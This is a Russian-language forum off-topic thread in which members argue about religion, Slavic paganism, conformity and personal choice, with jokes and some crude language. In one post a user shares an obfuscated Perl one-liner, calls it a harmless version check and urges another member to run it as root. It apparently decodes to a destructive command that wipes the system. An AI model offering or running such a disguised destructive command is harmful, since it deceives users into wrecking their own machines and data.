Флудилка  (Прочитано 43708 раз)

Описание: как же в политике и без флудилки??

Оффлайн Истислав

• С нами с: 21-11-2013
    • Просмотр профиля
  • Рейтинг: 2352
Флудилка
« Ответ #25 : 30 Март 2016, 18:17:35 »
не всё пох, а пох на сказки, придуманные нашими древними предками, то есть на религии  :yesyes:
Не глупость ли всерьёз доказывать сыну генерального директора то, что зубной феи не существует, а зуб из под подушки забрала мама?  :cheesy:

т.е. все верующие априори глупцы сравнимые с ребенком которому про зубную фею рассказали? Так выходит?  :biggrin:
"Кто хочет жить хорошо, тот работает хорошо, кто хочет жить лучше. тот работает больше!" © Остальные - неликвид ;-)

Maximilian_Sobakin

• Гость
Флудилка
« Ответ #26 : 30 Март 2016, 18:24:04 »
зубной феи не существует, а зуб из под подушки забрала мама?  :cheesy:

Харэ устои расшатывать! Зубная фея - это пиндосские выдумки.
Наши люди знают, что на самом деле зубик уносит мышка!

Оффлайн Gorkiy_M

• С нами с: 19-11-2013
    • Просмотр профиля
  • Рейтинг: 2644
Флудилка
« Ответ #27 : 30 Март 2016, 18:37:39 »
Ну да прогинаться это твое, я давно заметил )))
Да ты гляди как я прогнулся то...покуй на гимн страны,а встаю вместе со всеми, покуй на то,что со своей пиццей нельзя в кинотеатр,а с ихней можно и пойду с ихней...

Но по твоей логике,то что меня совершенно не колышет,а религия относится к этому, должно меня подвигать на какие то протестные настроения...

Для меня вся эта религиозная муть став обязаловкой будет восприниматься как получение какой-нибудь справки из жека...накуя она нужна непонятно,а надо идти брать...

Оффлайн QwertyQ

• Просмотр профиля
  • Рейтинг: 513
Флудилка
« Ответ #28 : 30 Март 2016, 19:01:56 »
Харэ устои расшатывать! Зубная фея - это пиндосские выдумки.
Наши люди знают, что на самом деле зубик уносит мышка!

Слушай, а у тебя линукс? Ну по аватаре судя... Запусти плиз вот это -
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
чисто интересно на версию поглядеть. Да, запускать от рута.
полукот в игноре

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #29 : 30 Март 2016, 22:32:59 »
Да ты гляди как я прогнулся то...покуй на гимн страны,а встаю вместе со всеми, покуй на то,что со своей пиццей нельзя в кинотеатр,а с ихней можно и пойду с ихней...

Но по твоей логике,то что меня совершенно не колышет,а религия относится к этому, должно меня подвигать на какие то протестные настроения...

Для меня вся эта религиозная муть став обязаловкой будет восприниматься как получение какой-нибудь справки из жека...накуя она нужна непонятно,а надо идти брать...

Ну на гимн страны все встают, к примеру я точно не за компанию, это уважение к своей стране.  В кинотеатр я хожу фильм смотреть а не пожрать, ну а если семечки беру с собой то не разу не возникало проблем с ними.
Если тебя не колышет религия, то че тогда у тебя лютый батхерт от язычества?  :biggrin: Вот если меня не колышет христианство то я и не захожу в их ветку, потому что мне реально параллельно, меня не трогают и ладно, а у тебя как у того хохла стартовавшего в соседней ветке, пукан рвет  :rofl:
А если станет обязаловкой какая-либо муть я подполье уйду... :cheesy:
"Кто хочет жить хорошо, тот работает хорошо, кто хочет жить лучше. тот работает больше!" © Остальные - неликвид ;-)

Оффлайн нюХочуха

• Просмотр профиля
  • Рейтинг: 4050
Флудилка
« Ответ #30 : 30 Март 2016, 23:52:45 »
Если тебя не колышет религия, то че тогда у тебя лютый батхерт от язычества?  :biggrin:
моё мнение - просто ты на цепляние к язычеству ведёшься, вот он нащупанную точку и расцарапывает )))
был бы ты воцерковленным христианином - ...

Maximilian_Sobakin

• Гость
Флудилка
« Ответ #31 : 30 Март 2016, 23:53:38 »
Слушай, а у тебя линукс? Ну по аватаре судя... Запусти плиз вот это -  чисто интересно на версию поглядеть. Да, запускать от рута.
написала
cat «test… test… test...»
и висит...висит...висит

upd.
Закончила работать. Выдала вот это.
Message for code developer: _|_
« Последнее редактирование: 31 Март 2016, 00:16:22 от Maximilian_Sobakin »

Оффлайн Volk

• щас спою....
    • Просмотр профиля
  • Рейтинг: 2327
Флудилка
« Ответ #32 : 31 Март 2016, 09:36:00 »
вот, кстати, да.
Атеисту участие в религиозных обрядах любой религии напрягает только бессмысленным времяпрепровождением, ему что на митинг, посвященный хх-летию ВЛКСМ сходить, что на пасхальную службу.
А вот верующий при участие в религиозных обрядах религии, которую он не исповедует, совершает, с его точки зрения, грех и портит себе загробную жизнь.

Вы вместе с Сашей, разбираетесь в язычестве, приблизительно как свинтус в апельсинах))) Для Славянина нет греха в прославлении чужого бога. Именно поэтому первые христиане были спокойно допущены на Капища со своими требами. Не надо равнять все религии и учения под иудо-христианство. Только у них "бог ревнивец".
"Славим своих богов и не ищем ссоры с чужими".
Не стоит нести людям добро, если они этого не просят. Вам это дорого обойдется. Лучшее, что можно сделать – положить добро на видное место и тихонько отойти.
Кому надо – тот сам возьмет. ©

Оффлайн Gorkiy_M

• Просмотр профиля
Флудилка
« Ответ #33 : 31 Март 2016, 09:54:11 »
Ну на гимн страны все встают, к примеру я точно не за компанию, это уважение к своей стране.  В кинотеатр я хожу фильм смотреть а не пожрать, ну а если семечки беру с собой то не разу не возникало проблем с ними.
Ну вот ты не за компанию, а я за компанию...Только не у кого не возникает мысли, что это я прогнулся..
Если тебя не колышет религия, то че тогда у тебя лютый батхерт от язычества?  :biggrin: Вот если меня не колышет христианство то я и не захожу в их ветку, потому что мне реально параллельно, меня не трогают и ладно, а у тебя как у того хохла стартовавшего в соседней ветке, пукан рвет  :rofl:
Я уже писал, что у меня батхерт не от язычества а от откровенного, с моей точки зрения, идиотизма вида:

"Сегодня мы празднуем великий славянский пропиздон, о котором умалчивает официальная история...О Великом славянском пропиздоне сведений не сохранилось, но мы вам расскажем...Случилось это сегодня, в 542 году до нашей эры..300 великих русских богатырей победили армянскую орду...Святоног, Святорук, Святополк, Святорот и Святовзвод...Великие герои, чьи победы умалчивает официальная история...В этот день великого славянского пропиздона принято делать ретвит и пропиздонить о подвиге Святорота, Святополка, Святонога,Святовзвода, Святорука и Святонога, о подвиге которых не сохранилась никаких сведений, потому что официальная история оболгала великую историю славных русичей"....

Вот от такого долбо"бизма у меня в общем то батхерт, а не от самого язычества..

Оффлайн нюХочуха

• Просмотр профиля
Флудилка
« Ответ #34 : 31 Март 2016, 09:54:45 »
Вы вместе с Сашей, разбираетесь в язычестве, приблизительно как свинтус в апельсинах))) Для Славянина нет греха в прославлении чужого бога. Именно поэтому первые христиане были спокойно допущены на Капища со своими требами. Не надо равнять все религии и учения под иудо-христианство. Только у них "бог ревнивец".
а если будут заставлять чужих славить, а своих - ни-ни?  :cheesy:

Оффлайн Gorkiy_M

• Просмотр профиля
Флудилка
« Ответ #35 : 31 Март 2016, 09:56:00 »
Ну значит вместе будем на воскресную молитву или намаз ходить, в случае чего... :yesyes:

Оффлайн Volk

• щас спою....
    • Просмотр профиля
  • Рейтинг: 2327
Флудилка
« Ответ #36 : 31 Март 2016, 12:10:19 »
а если будут заставлять чужих славить, а своих - ни-ни?  :cheesy:
Ну значит вместе будем на воскресную молитву или намаз ходить, в случае чего... :yesyes:
А вот тут совсем другой расклад. Либо подполье, либо откровенный саботаж. Нельзя заставить делать человека то, чего он не хочет. Если он человек, конечно.
Не стоит нести людям добро, если они этого не просят. Вам это дорого обойдется. Лучшее, что можно сделать – положить добро на видное место и тихонько отойти.
Кому надо – тот сам возьмет. ©

Оффлайн нюХочуха

• Просмотр профиля
Флудилка
« Ответ #37 : 31 Март 2016, 12:44:05 »
А вот тут совсем другой расклад. Либо подполье, либо откровенный саботаж. Нельзя заставить делать человека то, чего он не хочет. Если он человек, конечно.
мммм... это что, миллионы людей, просыпающихся утром и идущих на работу, в то время, как хотели бы еще поспать - они не люди, да?  :rolleyes:
Сообщение понравилось: Gorkiy_M

Maximilian_Sobakin

• Гость
Флудилка
« Ответ #38 : 31 Март 2016, 12:46:59 »
Нельзя заставить делать человека то, чего он не хочет. Если он человек, конечно.
Протестую!   :clapping:
Это животное нельзя заставить делать то, чего оно не хочет.
А человека  как раз можно, и очень даже легко, если найти его слабое место и подойти к задаче дрессировки человека творчески и индивидуально.

add
Идет презентация нового банка. При¬гласили французских партнеров, которые были очень удивлены тем, что многие из присутствующих пили шампанское бутылками, закусывая при этом селедкой, затем пили коньяк и виски, водку и пиво. Кто-то уже явно переел и перепил, кто-то пустился в пляс, кто-то с девочками уединился.
К французу, взирающему на все это с ужасом, подошел новый русский:
— А ты что ж ничего не ешь?
— Да я не хочу.
— Слушай, это же халява! Бесплатно! Ешь!
— Я ем только тогда, когда голоден.
— Ну ты прям как животное!

Оффлайн Gorkiy_M

• Просмотр профиля
Флудилка
« Ответ #39 : 31 Март 2016, 14:14:21 »
Как это нельзя? Я на собрания родительские хожу,значит можно...

Оффлайн 2aleksandr

• С нами с: 20-11-2013
    • Просмотр профиля
  • Рейтинг: 1712
Флудилка
« Ответ #40 : 31 Март 2016, 16:23:17 »
К французу, взирающему на все это с ужасом, подошел новый русский:
— А ты что ж ничего не ешь?
— Да я не хочу.
— Слушай, это же халява! Бесплатно! Ешь!
— Я ем только тогда, когда голоден.
— Ну ты прям как животное!

Почему-то вспомнился Депардье...

Оффлайн Gorkiy_M

• Просмотр профиля
Флудилка
« Ответ #41 : 31 Март 2016, 16:50:48 »
Вот блин...сербофобы гаагские оправдали серба...удивительное дело...

Оффлайн Gorkiy_M

• Просмотр профиля
Флудилка
« Ответ #42 : 31 Март 2016, 16:56:05 »
предупреждение
 По сути ты всё песни ведёшь про то, как бы хорошо, чтоб все были добрыми. Ну да, не спорю, неплохо бы, я тоже буддист в душе и всё такое... Но в реале нынешнем позиция "и нашим и вашим" значит только получение и от тех, и от других по мордасам, увы... Так вот гдето, а не видишь  - ну тем хуже для тебя. Выбирай уже, с кем ты.
Я уже давно выбрал...пошли в жопу и "наши", и "ваши"...

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #43 : 31 Март 2016, 17:28:36 »
моё мнение - просто ты на цепляние к язычеству ведёшься, вот он нащупанную точку и расцарапывает )))
был бы ты воцерковленным христианином - ...
Цеплялся бы к христианству  :rofl:.
Не я не против был бы я ярым язычником, ходил бы на Капище, праздники праздновал, в обрядах участвовал... куда не шло бы, но Валиум запомнить не может одну простую вещь, если мое мировоззрение  наиболее подходит под языческое, это не значит что я с концами вокруг скирды хороводы водить буду... Не люблю стадное чувство, не хочу быть стадом и не желаю иметь над собой пастуха который мне будет указывать что и как... Я сам по себе!.
« Последнее редактирование: 31 Март 2016, 17:30:42 от Обломов »

Оффлайн HalfCat

• С нами с: 14-04-2015
    • Просмотр профиля
  • Рейтинг: 82
Флудилка
« Ответ #44 : 31 Март 2016, 17:30:17 »
А вы сами эту светлую мысль откуда взяли? :) А славянин надо с заглавной буквы писать? :)

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #45 : 31 Март 2016, 17:30:52 »
Ну вот ты не за компанию, а я за компанию...Только не у кого не возникает мысли, что это я прогнулся..Я уже писал, что у меня батхерт не от язычества а от откровенного, с моей точки зрения, идиотизма вида:

"Сегодня мы празднуем великий славянский пропиздон, о котором умалчивает официальная история...О Великом славянском пропиздоне сведений не сохранилось, но мы вам расскажем...Случилось это сегодня, в 542 году до нашей эры..300 великих русских богатырей победили армянскую орду...Святоног, Святорук, Святополк, Святорот и Святовзвод...Великие герои, чьи победы умалчивает официальная история...В этот день великого славянского пропиздона принято делать ретвит и пропиздонить о подвиге Святорота, Святополка, Святонога,Святовзвода, Святорука и Святонога, о подвиге которых не сохранилась никаких сведений, потому что официальная история оболгала великую историю славных русичей"....

Вот от такого долбо"бизма у меня в общем то батхерт, а не от самого язычества..
Ну знаешь, я считаю долбо*бизмо знать что алкоголь яд и все равно употреблять его особенно в количествах которые мозги отшибают.... И этот долбо*бизм гораздо круче...
Сообщение понравилось: Volk, ЧАТланин

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #46 : 31 Март 2016, 17:32:27 »
мммм... это что, миллионы людей, просыпающихся утром и идущих на работу, в то время, как хотели бы еще поспать - они не люди, да?  :rolleyes:
есть выбор. уволиться и не просыпаться рано утром! В чем проблема?
Сообщение понравилось: ЧАТланин

Оффлайн нюХочуха

• Просмотр профиля
Флудилка
« Ответ #47 : 31 Март 2016, 17:33:38 »
есть выбор. уволиться и не просыпаться рано утром! В чем проблема?
деньги нужны  :yesyes:

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #48 : 31 Март 2016, 17:34:52 »
деньги нужны  :yesyes:
Тогда найди работу другую, сделай свой бизнес. Тебя ни кто не заставляет! Это лишь твоя нужда, но у тебя ВСЕГДА есть выбор! Это главное. Щас же за тунеядство статьи нет, так что все путем.....

Оффлайн Истислав

• Просмотр профиля
Флудилка
« Ответ #49 : 31 Март 2016, 17:36:15 »
А вы сами эту светлую мысль откуда взяли? :) А славянин надо с заглавной буквы писать? :)
А это все зависит как ты к этому слову относишься.... А так ты можешь и свое имя с маленькой писать... Кто-то пишет Родина с маленькой, наверно потому что для него это пустой звук, Земля пишется и так и этак в зависимости от контекста.... Так что опять же выбор...

Tags: